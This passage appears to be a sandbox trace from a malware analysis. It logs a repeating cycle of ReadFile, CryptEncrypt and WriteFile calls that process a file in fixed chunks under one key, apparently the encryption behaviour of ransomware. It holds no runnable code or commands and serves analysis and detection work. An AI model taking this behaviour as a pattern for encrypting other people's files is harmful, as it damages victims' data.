pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.783] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.783] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.783] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.784] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.784] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.784] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.784] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.784] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.784] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.784] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.784] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.784] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.784] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.784] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.784] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.784] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.784] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.785] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.785] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.785] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.785] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.785] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.785] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.785] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.785] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.785] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.785] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.785] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.785] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.785] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.785] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.785] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.786] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.786] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.786] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.786] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.786] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.786] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.786] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.786] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.786] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.786] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.786] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.786] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.786] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.786] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.787] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.787] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.787] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.787] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.787] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.787] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.787] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.787] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.787] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.787] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.787] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.787] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.787] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.788] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.788] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.788] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.788] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.788] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.788] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.788] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.788] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.788] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.788] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.788] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.788] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.788] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.788] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.789] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.789] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.789] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.789] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.789] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.789] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.789] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.789] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.789] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.789] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.789] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.789] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.789] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.789] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.789] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.790] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.790] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.790] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.790] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.790] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.790] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.790] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.790] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.790] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.790] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.790] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.790] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.790] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, 